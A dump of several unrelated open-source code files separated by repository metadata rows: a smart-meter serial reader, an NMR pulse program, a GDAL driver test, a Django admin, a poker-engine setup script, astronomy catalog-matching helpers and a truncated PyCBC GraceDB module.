| agpl-3.0 | -2,328,418,225,493,275,600 | 35.209302 | 78 | 0.708414 | false |
Fodij/ZonStroom | read/P1tofiles.py | 1 | 8337 | #!/usr/bin/python
versie = 1.0
from datetime import datetime, timedelta
import re
import serial
import sys
from metingen import meting
# --- Meter read information ---
# Maximum number of lines that may be read;
# used to stop the program when no 'eofline' ever arrives
maxlines = 30
# End-of-message line
eofline = '!'
# Number of expected lines (differs per smart meter type)
expectedlines = 17
# Header of the datagram for this meter
# note the r prefix, which prevents \ from being treated as an
# escape character
meteridentification = r"/ISk5\2ME382-1003"
# --- File information ---
# File holding the previous reading
root_dir = '/usr/local/P1tools/database'
if root_dir[-1] != '/':
    root_dir = root_dir + '/'
vorige_meting_bestand = 'vorige_meting'
# Information the meter provides
meterinfo = [
'meter_id',
'gebruikt1',
'gebruikt2',
'geleverd1',
'geleverd2',
'huidigtarief',
'vermogen_in',
'vermogen_uit',
'max_vermogen',
'stroom_hoofdschakelaar',
'tekst_code',
'tekst',
'device_type',
'gas_meter_id',
'gas_meetdatum',
'gas_hoofdschakelaar',
'gas_gebruik',
'datum_tijd'
]
# Recognition strings for the meter information
meteruitvoerformaat_list = [
'0-0:96.1.1',
'1-0:1.8.1',
'1-0:1.8.2',
'1-0:2.8.1',
'1-0:2.8.2',
'0-0:96.14.0',
'1-0:1.7.0',
'1-0:2.7.0',
'0-0:17.0.0',
'0-0:96.3.10',
'0-0:96.13.1',
'0-0:96.13.0',
'0-1:24.1.0',
'0-1:96.1.0',
'0-1:24.3.0',
'0-1:24.4.0',
'(',
'Not applicable'
]
meteruitvoerformaat = dict(zip(meterinfo,meteruitvoerformaat_list))
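# For illustration: a raw P1 datagram line pairs an OBIS reference with a
# value in parentheses, e.g. "1-0:1.8.1(012345.678*kWh)"; lees_meter() below
# matches the prefix and slices out the part between '(' and ')'.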
meteruitvoer_waarden = [
'gebruikt1','gebruikt2','geleverd1',
'geleverd2','vermogen_in','vermogen_uit',
'max_vermogen','gas_gebruik'
]
##############################################################################
# Read meter information
##############################################################################
def lees_meter():
    # Configure the serial port
ser = serial.Serial()
ser.baudrate = 9600
ser.bytesize=serial.SEVENBITS
ser.parity=serial.PARITY_EVEN
ser.stopbits=serial.STOPBITS_ONE
    # Hopefully this helps to receive complete messages;
    # at 0 this was a problem, although cu enables this by default
    # and the problem did not occur there
    ser.xonxoff=1
    ser.rtscts=0
    # timeout while waiting for input;
    # a message must arrive every 10 seconds
    ser.timeout=12
    # Serial port the P1-to-USB interface is attached to
ser.port="/dev/ttyUSB0"
    # Open the serial port
try:
ser.open()
except:
sys.exit ("Fout bij het openen van seriele poort %s" % ser.name)
p1_output = []
nlines = 0
nparsedlines = 0
header = False
while (nlines < maxlines):
try:
line = str(ser.readline()).strip()
nlines = nlines + 1
            # A header must arrive first.
            # This prevents us from parsing incomplete datagrams
if not header:
if line == meteridentification:
header = True
else:
if line == eofline:
break
elif line != '':
p1_output.append(line)
nparsedlines = nparsedlines + 1
except:
sys.exit ("Kon seriele poort niet openen")
#Close port and show status
try:
ser.close()
except:
sys.exit ("Programma afgebroken. Kon de seriele poort %s niet sluiten." % ser.name )
# Initialiseer dictionary met datum van de meting
meteruitvoer={'datum_tijd':datetime.now()}
# Parse de meter uitvoer
for line in p1_output:
#DEBUG print line
for key in meteruitvoerformaat:
if line.startswith(meteruitvoerformaat[key]):
meteruitvoer[key] = line[line.find('(')+1:line.find(')')]
for key in meteruitvoer_waarden:
try:
meteruitvoer[key] = float(re.sub('[^0-9\.]', '', meteruitvoer[key]))
except KeyError:
sys.exit("Missende invoer vanuit meter, waarschijnlijk probleem met seriele poort")
# DEBUG
# for key in meteruitvoer:
# print key + ': ' + str(meteruitvoer[key])
if nparsedlines != expectedlines:
sys.exit("ERROR: aantal regels (%i) is anders dan verwacht (%i)!" % (nparsedlines,expectedlines))
return meteruitvoer
def lees_vorige_meting(huidige_meting):
    # Read the previous reading
vorige_meting = {}
try:
with open(root_dir + vorige_meting_bestand,'r') as f:
for line in f:
for key in meteruitvoerformaat:
if line.startswith(key + ':'):
vorige_meting[key] = line[line.find(':')+1:-1]
except IOError:
pass
if vorige_meting == {}:
vorige_meting = huidige_meting
else:
for key in meteruitvoer_waarden:
vorige_meting[key] = float(vorige_meting[key])
vorige_meting['datum_tijd'] = datetime.strptime(vorige_meting['datum_tijd'], "%Y-%m-%d %H:%M:%S.%f")
return vorige_meting
def schrijf_vorige_meting(meteruitvoer):
    # Write the previous reading
try:
with open(root_dir + vorige_meting_bestand,'w') as f:
for key in meteruitvoer:
f.write(key + ':' + str(meteruitvoer[key]) + '\n')
except IOError:
        sys.exit('Problem writing the current reading as the previous reading')
def maak_stroommeting(meteruitvoer):
stroommeting = meting([meteruitvoer['gebruikt1'], meteruitvoer['gebruikt2'], meteruitvoer['geleverd1'], meteruitvoer['geleverd2']],
["meettijd" ,"gebruikt1" ,"gebruikt2" ,"geleverd1" ,"geleverd2",
"vermogen1_in","vermogen2_in","vermogen1_uit","vermogen2_uit" ],
meteruitvoer['datum_tijd'], delta = True)
return stroommeting
def maak_gasmeting(meteruitvoer):
gasmeting = meting([meteruitvoer['gas_gebruik']],
["meettijd", "gebruik", "m3/u"],
datetime.strptime(meteruitvoer["gas_meetdatum"], "%y%m%d%H%M%S"),delta = True)
return gasmeting
def maak_vermogenmeting(meteruitvoer):
vermogenmeting = meting([meteruitvoer['vermogen_in'],
meteruitvoer['vermogen_uit']],
['meettijd','vermogen_in','vermogen_uit'],meteruitvoer['datum_tijd'])
return vermogenmeting
def maak_overigemeting(meteruitvoer):
overigemeting = meting([meteruitvoer['meter_id'],meteruitvoer['huidigtarief'],meteruitvoer['max_vermogen'],
meteruitvoer['stroom_hoofdschakelaar'],meteruitvoer['tekst_code'],meteruitvoer['tekst'],
meteruitvoer['device_type'],meteruitvoer['gas_meter_id'],meteruitvoer['gas_hoofdschakelaar']],
['meettijd','meterid','huidigtarief','max_vermogen','stroom_hoofdschakelaar','tekst_code','tekst',
'device_type','gas_meter_id','gas_hoofdschakelaar'],
meteruitvoer['datum_tijd'], verschillend = True)
return overigemeting
def main():
    # Read the meter output and convert it to a dictionary
    huidige_meting = lees_meter()
    # Read in the previous reading
    vorige_meting = lees_vorige_meting(huidige_meting)
    # Define the electricity reading
    stroommeting = maak_stroommeting(huidige_meting)
    vorige_stroommeting = maak_stroommeting(vorige_meting)
    # Define the gas reading
    gasmeting = maak_gasmeting(huidige_meting)
    vorige_gasmeting = maak_gasmeting(vorige_meting)
    # Define the power reading
    vermogenmeting = maak_vermogenmeting(huidige_meting)
    vorige_vermogenmeting = maak_vermogenmeting(vorige_meting)
    # Define the remaining info
    overigemeting = maak_overigemeting(huidige_meting)
    vorige_overigemeting = maak_overigemeting(vorige_meting)
    # Write the electricity reading
    stroommeting.schrijf_alles(vorige_stroommeting, root_dir, '.stroom')
    # Write the gas reading
    gasmeting.schrijf_alles(vorige_gasmeting, root_dir, '.gas')
    # Write the power reading
    vermogenmeting.schrijf_alles(vorige_vermogenmeting, root_dir, '.vermogen')
    # Write the remaining measured values
    overigemeting.schrijf_alles(vorige_overigemeting, root_dir, '.overig')
    # Write a new previous reading
    schrijf_vorige_meting(huidige_meting)
if __name__ == "__main__":
main()
| gpl-2.0 | -2,265,219,109,054,684,700 | 31.189189 | 134 | 0.623006 | false |
mrosenstihl/PulsePrograms | autoPFGMASSEY/auto-PFG-MASSEY_exp.py | 1 | 5445 | import numpy as N
class ParameterSet:
"""
From
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52308
Alex Martelli
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
def MASSEY(**parameter_set):
e=Experiment()
for key in parameter_set.keys():
e.set_description(key,parameter_set[key])
par = ParameterSet(**parameter_set)
e.set_frequency(par.frequency,0) # needs 2 microseconds Phase
ph1 = 0
ph2 = 90
rec_ph=120
############ PFG sequence #############
e.set_phase(ph1) # phase 1
e.wait(par.repetition_time)
e.ttl_pulse(par.gate, value=1) # gate 2**0
e.ttl_pulse(par.pi/2, value=3) # gate+rf 2**0+2**1
e.set_phase(ph2) # Phase 2
e.wait((par.tau-par.delta)/2-0.5e-6-3.8e-6)
########## sin**2 gradient ##########
#for i in xrange(par.points):
# e.set_pfg(dac_value=int(par.dac*N.sin(i*N.pi/par.points)**2),length=par.delta/par.points, is_seq=1) # pfg 1
#e.set_pfg(dac_value=0)
e.set_pfg(dac_value=par.dac, length=par.delta, shape=('sin2',20e-6))
e.wait((par.tau-par.delta)/2-par.read_length-150e-6)
e.set_pfg(dac_value=par.read_gradient, length=par.read_length)
e.wait(150e-6) # keeping distance to pulse
e.ttl_pulse(par.gate, value=1) # gate 2**0
e.ttl_pulse(par.pi, value=3) # gate+rf 2**0+2**1
e.set_phase(rec_ph) # rec phase
e.wait((par.tau-par.delta)/2-0.5e-6-3.8e-6)
########## sin**2 gradient ##########
#for i in xrange(par.points):
# e.set_pfg(dac_value=int(par.dac*N.sin(i*N.pi/par.points)**2),length=par.delta/par.points, is_seq=1) # pfg 1
#e.set_pfg(dac_value=0)
e.set_pfg(dac_value=par.dac, length=par.delta, shape=('sin2',20e-6))
if par.echo_shift > (par.tau-par.delta)/2:
        raise ValueError("echo_shift must not exceed (tau - delta)/2")
#e.wait(1e-3)
e.wait((par.tau-par.delta)/2-par.echo_shift)
e.set_pfg(dac_value=par.read_gradient,length=5e-6, is_seq=1)
e.record(par.samples, par.samplerate, par.sensitivity)
e.set_pfg(dac_value=0)
return e
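# Timing note (illustrative): each half of the sequence waits
# (tau - delta)/2 around a delta-long gradient pulse, so the spin echo forms
# near 2*tau after the first pulse; echo_shift must stay below
# (tau - delta)/2, which the check in MASSEY enforces.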
def experiment():
starttime = 1e-3
endtime = 7e-3
points = 5
T1= 0.0002
rep_time = 5*T1
tips =log_range(starttime,endtime,points)
timepoints = [i for i in tips]
timepoints = [3e-3]#[10e-3]
dac_values = N.arange(0, 300001, 30000)
no_akku=1
bvt = 285
tmp=279
print "Estimated time (h):", len(timepoints)*len(dac_values)*no_akku*rep_time/3600.0
for tp in timepoints: # timepoints
# First we need the Echo position WITHOUT PFGs
for akku in xrange(no_akku): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = 0,
read_gradient = 0,
read_length=0.2e-3,
akku = akku,
no_akku = no_akku,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "original")
synchronize() # making sure that the echo position is indeed determined and saved
# Doing now exactly one phase cycle to find the current echo position for each applied gradient
for dv in dac_values:
synchronize()
for akku in xrange(16): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = int(dv),
read_gradient =int(50e-3/6.7e-5),
read_length=0.4e-3,
akku = akku,
no_akku = 16,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "test")
synchronize()
# Read in the correction data
correction = pickle.read('.correction_data')
for akku in xrange(no_akku): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = int(dv),
read_gradient =int(50e-3/6.7e-5),
read_length=0.2e-3+correction,
akku = akku,
no_akku = no_akku,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "final") | bsd-2-clause | -43,041,400,716,493,464 | 35.797297 | 116 | 0.474564 | false |
nextgis-extra/tests | lib_gdal/gdrivers/ndf.py | 1 | 2985 | #!/usr/bin/env python
###############################################################################
# $Id: ndf.py 32163 2015-12-13 17:44:50Z goatbar $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NLAPS/NDF driver.
# Author: Frank Warmerdam <[email protected]>
#
###############################################################################
# Copyright (c) 2008, Frank Warmerdam <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Simple image test of an NLAPS/NDF2 dataset.
def ndf_1():
tst = gdaltest.GDALTest( 'NDF', 'LE7134052000500350.H3', 1, 6510,
xoff = 0, yoff = 0, xsize = 15620, ysize = 1 )
gt = (320325.75, 14.25, 0, 1383062.25, 0, -14.25)
wkt = """PROJCS["UTM Zone 46, Northern Hemisphere",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
TOWGS84[0,0,0,0,0,0,0],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9108"]],
AXIS["Lat",NORTH],
AXIS["Long",EAST],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",93],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["Meter",1]]"""
return tst.testOpen( check_gt = gt, gt_epsilon = 0.0001,
check_prj = wkt )
gdaltest_list = [
ndf_1 ]
if __name__ == '__main__':
gdaltest.setup_run( 'ndf' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
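# Run directly (illustrative): `python ndf.py` executes ndf_1 through the
# gdaltest harness, comparing the geotransform and projection parsed from the
# NLAPS header against the expected values above.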
| gpl-2.0 | -1,873,844,852,143,710,700 | 35.402439 | 79 | 0.58727 | false |
Mercy-Nekesa/sokoapp | sokoapp/request/admin.py | 1 | 3023 | import json
from datetime import timedelta, date
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import render_to_response
from functools import update_wrapper
from django.template import RequestContext
from django.contrib import admin
from django.http import HttpResponse
from request.models import Request
from request.traffic import modules
from request.plugins import *
class RequestAdmin(admin.ModelAdmin):
list_display = ('time', 'path', 'response', 'method', 'request_from')
fieldsets = (
(_('Request'), {
'fields': ('method', 'path', 'time', 'is_secure', 'is_ajax')
}),
(_('Response'), {
'fields': ('response',)
}),
(_('User info'), {
'fields': ('referer', 'user_agent', 'ip', 'user', 'language')
})
)
raw_id_fields = ('user',)
readonly_fields = ('time',)
def lookup_allowed(self, key, value):
return key == 'user__username' or super(RequestAdmin, self).lookup_allowed(key, value)
def request_from(self, obj):
if obj.user_id:
user = obj.get_user()
return '<a href="?user__username=%s" title="%s">%s</a>' % (user.username, _('Show only requests from this user.'), user)
return '<a href="?ip=%s" title="%s">%s</a>' % (obj.ip, _('Show only requests from this IP address.'), obj.ip)
request_from.short_description = 'From'
request_from.allow_tags = True
def get_urls(self):
from django.conf.urls import patterns, url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.module_name
return patterns('',
url(r'^overview/$', wrap(self.overview), name='%s_%s_overview' % info),
url(r'^overview/traffic.json$', wrap(self.traffic), name='%s_%s_traffic' % info),
) + super(RequestAdmin, self).get_urls()
def overview(self, request):
qs = Request.objects.this_month()
for plugin in plugins.plugins:
plugin.qs = qs
return render_to_response('admin/request/request/overview.html', {
'title': _('Request overview'),
'plugins': plugins.plugins,
}, context_instance=RequestContext(request))
def traffic(self, request):
try:
days_count = int(request.GET.get('days', 30))
except ValueError:
days_count = 30
if days_count < 10:
days_step = 1
elif days_count < 60:
days_step = 2
else:
days_step = 30
days = [date.today() - timedelta(day) for day in xrange(0, days_count, days_step)]
days_qs = [(day, Request.objects.day(date=day)) for day in days]
return HttpResponse(json.dumps(modules.graph(days_qs)), mimetype='text/javascript')
admin.site.register(Request, RequestAdmin)
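# The overview page registered above is served at request/request/overview/
# inside the admin and fetches its chart data from overview/traffic.json,
# where ?days=N selects the window (sampled every 1, 2 or 30 days depending
# on N, as implemented in traffic()).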
| mit | 7,751,704,638,266,843,000 | 34.564706 | 132 | 0.597089 | false |
pokermania/pokerengine | setup.py | 1 | 5092 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from os.path import basename
from glob import glob
from distutils.core import setup
from distutils.command.build import build as DistutilsBuild
class ExtendedBuild(DistutilsBuild):
def run(self):
os.system("make -C po")
os.system("bash conf/build.sh")
DistutilsBuild.run(self)
setup(
name='poker-engine',
version='1.5.4',
packages=['pokerengine'],
data_files=[
('bin', ['pokerconfigupgrade']),
('share/poker-engine/conf', [
'conf/poker.0-0_50-5000_limit.xml',
'conf/poker.0-0-limit.xml',
'conf/poker.100000-200000_6000000-8000000_pokermania.xml',
'conf/poker.100-200_10000-15000_pokermania.xml',
'conf/poker.100-200_2000-20000_no-limit.xml',
'conf/poker.100-200_2000-20000_pot-limit.xml',
'conf/poker.100-200_8000-10000_pokermania.xml',
'conf/poker.10-20_100-2000000_ante-limit.xml',
'conf/poker.10-20_200-2000_no-limit.xml',
'conf/poker.10-20_200-2000_pot-limit.xml',
'conf/poker.1-2_10-100_pokermania.xml',
'conf/poker.1-2_20-200_limit.xml',
'conf/poker.1-2_20-200_no-limit.xml',
'conf/poker.1-2_20-200_pot-limit.xml',
'conf/poker.15000-30000_1000000-1500000_pokermania.xml',
'conf/poker.15000-30000_1500000-2000000_pokermania.xml',
'conf/poker.1500-3000_100000-150000_pokermania.xml',
'conf/poker.1500-3000_150000-200000_pokermania.xml',
'conf/poker.15-30_300-3000_limit.xml',
'conf/poker.200-400_15000-20000_pokermania.xml',
'conf/poker.200-400_20000-25000_pokermania.xml',
'conf/poker.20-40_1000-2000_pokermania.xml',
'conf/poker.20-40_2000-4000_pokermania.xml',
'conf/poker.2-4_100-200_pokermania.xml',
'conf/poker.2-4_10-100_pokermania.xml',
'conf/poker.2-4_40-400_no-limit.xml',
'conf/poker.2-4_40-400_pot-limit.xml',
'conf/poker.2500-5000_200000-250000_pokermania.xml',
'conf/poker.2500-5000_250000-300000_pokermania.xml',
'conf/poker.25-50_500-5000_limit.xml',
'conf/poker.300-600_25000-30000_pokermania.xml',
'conf/poker.300-600_30000-40000_pokermania.xml',
'conf/poker.30-60_300-6000000_ante-limit.xml',
'conf/poker.30-60_600-6000_no-limit.xml',
'conf/poker.30-60_600-6000_pot-limit.xml',
'conf/poker.3-6_60-600_no-limit.xml',
'conf/poker.3-6_60-600_pot-limit.xml',
'conf/poker.4000-8000_300000-400000_pokermania.xml',
'conf/poker.4000-8000_400000-600000_pokermania.xml',
'conf/poker.500-1000_40000-50000_pokermania.xml',
'conf/poker.500-1000_50000-100000_pokermania.xml',
'conf/poker.50-100_1000-10000_limit.xml',
'conf/poker.50-100_1000-10000_no-limit.xml',
'conf/poker.50-100_1000-10000_pot-limit.xml',
'conf/poker.5-10_100-1000_limit.xml',
'conf/poker.5-10_100-1000_no-limit.xml',
'conf/poker.5-10_100-1000_pot-limit.xml',
'conf/poker.5-10_200-500_pokermania.xml',
'conf/poker.5-10_500-1000_pokermania.xml',
'conf/poker.60-120_4000-6000_pokermania.xml',
'conf/poker.60-120_6000-8000_pokermania.xml',
'conf/poker.7stud.xml',
'conf/poker.8000-16000_600000-800000_pokermania.xml',
'conf/poker.8000-16000_800000-1000000_pokermania.xml',
'conf/poker.holdem.xml',
'conf/poker.level-001.xml',
'conf/poker.level-10-15-pot-limit.xml',
'conf/poker.level-10-20-no-limit-lsng9.xml',
'conf/poker.level-10-20-no-limit.xml',
'conf/poker.level-15-30-no-limit-wfrmtt.xml',
'conf/poker.level-15-30-no-limit-wsop.xml',
'conf/poker.level-15-30-no-limit.xml',
'conf/poker.level-2-4-limit.xml',
'conf/poker.level-50-100-no-limit-deep-stack.xml',
'conf/poker.level-10-20-no-limit-ante-mtt.xml',
'conf/poker.levels-ante-colin.xml',
'conf/poker.levels-blinds-colin.xml',
'conf/poker.levels-ante-mtt.xml',
'conf/poker.levels-blinds-mtt.xml',
'conf/poker.levels-blinds-deep-stack.xml',
'conf/poker.levels-blinds-lsng9.xml',
'conf/poker.levels-blinds.xml',
'conf/poker.omaha8.xml',
'conf/poker.omaha.xml',
'conf/poker.payouts.xml',
'conf/poker.razz.xml',
]),
('share/man/man8', ['pokerconfigupgrade.8']),
('share/doc/python-poker-engine', ['AUTHORS', 'README.md'])
] + [(
'share/locale/%s/LC_MESSAGES' % locale,
['locale/%s/LC_MESSAGES/poker-engine.mo' % locale]
) for locale in list(basename(po).rsplit('.', 1)[0] for po in glob('po/*.po'))],
cmdclass={'build': ExtendedBuild }
)
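# Note: the ExtendedBuild hook above regenerates the gettext catalogs
# (make -C po) and runs conf/build.sh before the normal distutils build, so
# building from source needs make available (and, presumably, msgfmt for the
# .po -> .mo compilation).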
| gpl-3.0 | -8,928,794,915,129,660,000 | 44.464286 | 84 | 0.587588 | false |
Noysena/TAROT | Filter_data.py | 1 | 4059 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 18:09:24 2016
@author: nu
"""
from astropy.coordinates import SkyCoord
from astroquery.vizier import Vizier
from astropy import units as u
from astropy.table import Table
import numpy as np
import os, time
def reoffset(d2d, matches, Cdata, Ccata):
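    """Iteratively shift the data coordinates by the median RA/Dec offset to
    their matched catalog stars, re-matching after every shift, until the
    median separation drops below 0.3 arcsec or 10 iterations have run.
    """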
n = 0
while n <=9:
#for loop in range (5):
delta_RA = matches.ra.deg - Cdata.ra.deg
delta_DEC = matches.dec.deg - Cdata.dec.deg
reRA = Cdata.ra.deg + np.median(delta_RA)
reDEC = Cdata.dec.deg + np.median(delta_DEC)
Cdata = SkyCoord(reRA, reDEC, frame = 'icrs', unit = (u.deg, u.deg))
idx, d2d, d3d = Cdata.match_to_catalog_sky(Ccata)
matches = Ccata[idx] # Obtain coordinate of closest star in catalog
        if np.median(d2d.arcsec) < 0.3: # spatial sampling is 3.3" and expected precision is 0.69", so 0.3" is impossible to reach
break
n += 1
return idx,d2d, d3d, matches, Cdata
def Lsep_candi(STD, idx, d2d, data):
idx_candi_data_0 = np.where(d2d.arcsec >= (np.median(d2d.arcsec) + STD*d2d.arcsec.std()))
idx_candi_data = np.array(idx_candi_data_0).flatten()
idx_candi_cata = idx[idx_candi_data]
return idx_candi_cata, idx_candi_data
# the first index comes from the catalog, the second from the data;
# use idx_candi_cata with the catalog and idx_candi_data with the data
def XYlimit(Cdata_offset,idx_candi_data, idx_candi_cata, wcs):
Xpcandi, Ypcandi = wcs.all_world2pix(Cdata_offset[idx_candi_data].ra, Cdata_offset[idx_candi_data].dec, 0)
XYpcandi_table = Table([Xpcandi, Ypcandi], masked=True, names=('Xpix', 'Ypix'), meta={'name':'Candidate in XYimage'})
XYpcandi_lim = []
for i in range(len(XYpcandi_table)):
if 8.0 < XYpcandi_table[i][0] < 2040.0:
if 8.0 < XYpcandi_table[i][1] < 2040.0:
XYpcandi_lim.append(i)
idx_XYpcandi_lim = np.array(XYpcandi_lim, int)
XYcandi = XYpcandi_table[XYpcandi_lim]
#idx of data useful for indicate in data table
idx_XYcandi_data = idx_candi_data[idx_XYpcandi_lim]
#idx of data useful for indicate in catalog table
idx_XYcandi_cata = idx_candi_cata[idx_XYpcandi_lim]
return XYcandi, idx_XYcandi_data, idx_XYcandi_cata
#Convert world to pixel
def W_to_P(Ccata, Cdata_offset, matches, wcs):
Cx, Cy = wcs.all_world2pix(Ccata.ra, Ccata.dec,0)
Mx, My = wcs.all_world2pix(matches.ra, matches.dec,0)
OFx, OFy = wcs.all_world2pix(Cdata_offset.ra, Cdata_offset.dec,0)
Catalog_WTP = Table([Cx, Cy], masked=True, names=('X(RA)', 'Y(DEC)'))
Matches_WTP = Table([Mx, My], masked=True, names=('X(RA)', 'Y(DEC)'))
    Cdata_offset_WTP = Table([OFx, OFy], masked=True, names=('X(RA)', 'Y(DEC)'))
return Catalog_WTP, Matches_WTP, Cdata_offset_WTP
#add magnitude to SExtractor data
def tbmagnitude(idx, data, cata):
# mag_auto = data['MAG_AUTO']
Gmag = cata['phot_g_mean_mag'][idx]
# tbmag = Table([mag_auto, Gmag], masked=True, names=('MAG_AUTO', 'phot_g_mean_mag'), meta={'name':'Magnitude list'})
data.add_column(Gmag,index=None)
# tbmag.write('/tmp/tbmag.dat', format = 'ascii')
# while not os.path.exists('/tmp/tbmag.dat'):
# time.sleep(1)
return data
def Check_candidate(Cdata_candi, Candi_d2d): #USNO-B1.0
confirm_candi = []; confirm = []
for i in range(len(Cdata_candi)):
confirm_candi = Vizier(catalog="USNO-B1.0",column_filters={"R1mag":"<18.0"}, row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi:
confirm.append(i)
info_check_candi = Candi_d2d[confirm]
return info_check_candi
def Check_candidate_Nomad1(Cdata_candi, Candi_d2d):
confirm_candi = []; confirm = []
for i in range(len(Cdata_candi)):
confirm_candi = Vizier(catalog="NOMAD1",column_filters={"Rmag":"<18.0"}, row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi:
confirm.append(i)
info_check_candi = Candi_d2d[confirm]
return info_check_candi
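# Typical flow (illustrative; inputs are SkyCoord arrays built from
# SExtractor detections and a reference catalog):
#
#     idx, d2d, d3d, matches, Cdata_offset = reoffset(d2d0, matches0, Cdata, Ccata)
#     idx_candi_cata, idx_candi_data = Lsep_candi(3.0, idx, d2d, data)
#     candidates = Check_candidate(Cdata_offset[idx_candi_data], d2d[idx_candi_data])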
| gpl-3.0 | 5,036,790,887,645,295,000 | 42.180851 | 162 | 0.651392 | false |
hagabbar/pycbc_copy | pycbc/io/live.py | 1 | 16023 | import logging
import os
import pycbc
import numpy
import lal
from pycbc_glue.ligolw import ligolw
from pycbc_glue.ligolw import lsctables
from pycbc_glue.ligolw import utils as ligolw_utils
from pycbc_glue.ligolw.utils import process as ligolw_process
from pycbc_glue.ligolw import param as ligolw_param
from pycbc import version as pycbc_version
from pycbc import pnutils
from pycbc.tmpltbank import return_empty_sngl
from pycbc.filter import compute_followup_snr_series
#FIXME Legacy build PSD xml helpers, delete me when we move away entirely from
# xml formats
def _build_series(series, dim_names, comment, delta_name, delta_unit):
from pycbc_glue.ligolw import array as ligolw_array
Attributes = ligolw.sax.xmlreader.AttributesImpl
elem = ligolw.LIGO_LW(Attributes({u"Name": unicode(series.__class__.__name__)}))
if comment is not None:
elem.appendChild(ligolw.Comment()).pcdata = comment
elem.appendChild(ligolw.Time.from_gps(series.epoch, u"epoch"))
elem.appendChild(ligolw_param.from_pyvalue(u"f0", series.f0, unit=u"s^-1"))
delta = getattr(series, delta_name)
if numpy.iscomplexobj(series.data.data):
data = numpy.row_stack((numpy.arange(len(series.data.data)) * delta,
series.data.data.real, series.data.data.imag))
else:
data = numpy.row_stack((numpy.arange(len(series.data.data)) * delta, series.data.data))
a = ligolw_array.from_array(series.name, data, dim_names=dim_names)
a.Unit = str(series.sampleUnits)
dim0 = a.getElementsByTagName(ligolw.Dim.tagName)[0]
dim0.Unit = delta_unit
dim0.Start = series.f0
dim0.Scale = delta
elem.appendChild(a)
return elem
def snr_series_to_xml(snr_series, document, sngl_inspiral_id):
"""Save an SNR time series into an XML document, in a format compatible
with BAYESTAR.
"""
snr_lal = snr_series.lal()
snr_lal.name = 'snr'
snr_lal.sampleUnits = ''
snr_xml = _build_series(snr_lal, (u'Time', u'Time,Real,Imaginary'), None,
'deltaT', 's')
snr_node = document.childNodes[-1].appendChild(snr_xml)
eid_param = ligolw_param.new_param(u'event_id', u'ilwd:char',
unicode(sngl_inspiral_id))
snr_node.appendChild(eid_param)
def make_psd_xmldoc(psddict):
Attributes = ligolw.sax.xmlreader.AttributesImpl
xmldoc = ligolw.Document()
root_name = u"psd"
lw = xmldoc.appendChild(ligolw.LIGO_LW(Attributes({u"Name": root_name})))
for instrument, psd in psddict.items():
xmlseries = _build_series(psd, (u"Frequency,Real", u"Frequency"),
None, 'deltaF', 's^-1')
fs = lw.appendChild(xmlseries)
fs.appendChild(ligolw_param.from_pyvalue(u"instrument", instrument))
return xmldoc
class SingleCoincForGraceDB(object):
"""Create xml files and submit them to gracedb from PyCBC Live"""
def __init__(self, ifos, coinc_results, **kwargs):
"""Initialize a ligolw xml representation of a zerolag trigger
for upload from pycbc live to gracedb.
Parameters
----------
ifos: list of strs
            A list of the ifos participating in this trigger
coinc_results: dict of values
A dictionary of values. The format is defined in
pycbc/events/coinc.py and matches the on disk representation
in the hdf file for this time.
"""
followup_ifos = kwargs.get('followup_ifos') or []
self.template_id = coinc_results['foreground/%s/template_id' % ifos[0]]
# remember if this should be marked as HWINJ
